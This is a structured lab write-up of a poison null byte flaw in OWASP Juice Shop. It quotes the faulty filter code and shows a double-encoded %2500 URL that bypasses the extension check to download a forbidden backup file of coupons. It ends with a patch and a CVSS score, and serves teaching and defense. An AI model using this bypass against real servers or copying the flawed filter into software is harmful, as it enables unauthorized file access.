## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Error Handling
  Location:
    / - Error Handling
  CWE:
    CWE-626: Null Byte Interaction Error (Poison Null Byte)
  Rule:
    REQ.176: https://fluidattacks.com/web/es/rules/176/
  Goal:
    Download a forbidden file from the ftp
  Recommendation:
    Properly remove null bytes from filenames

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  Dev environment
    Given I see the code at "insecurity.js"
    """
    ...
    16  exports.cutOffPoisonNullByte = str => {
    17    const nullByte = '%00'
    18    if (utils.contains(str, nullByte)) {
    19      return str.substring(0, str.indexOf(nullByte))
    20    }
    21    return str
    22  }
    ...
    """
    Then I see it just checks for a url encoded nullbyte instead of "\0"

  Scenario: Dynamic detection
  Causing a system error
    Given I go to "http://localhost:8000/ftp/"
    Then I see a file called "coupons_2013.md.bak"
    Then I click to download it "http://localhost:8000/ftp/coupons_2013.md.bak"
    Then I get an error
    """
    403 Error: Only .md and .pdf files are allowed!
    """
    Then I try putting a url-encoded null byte after the extension and add '.md'
    """
    http://localhost:8000/ftp/coupons_2013.md.bak%00.md
    """
    But I get a bad request error
    """
    400 BadRequestError: Bad Request
    """
    Then I try URL-encoding the '%'
    """
    http://localhost:8000/ftp/coupons_2013.md.bak%2500.md
    """
    And I can download the file [evidence](download.png)

  Scenario: Exploitation
  Using leaked info
    Given I downloaded a file full of coupons
    Then I can use them to buy stuff for really cheap
    And cost the company money

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    16  exports.cutOffPoisonNullByte = str => {
    17    return str.replace(/\0/g, '')
    18  }
    ...
    """
    Then the null bytes are completely removed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.9/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    4.9/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-01
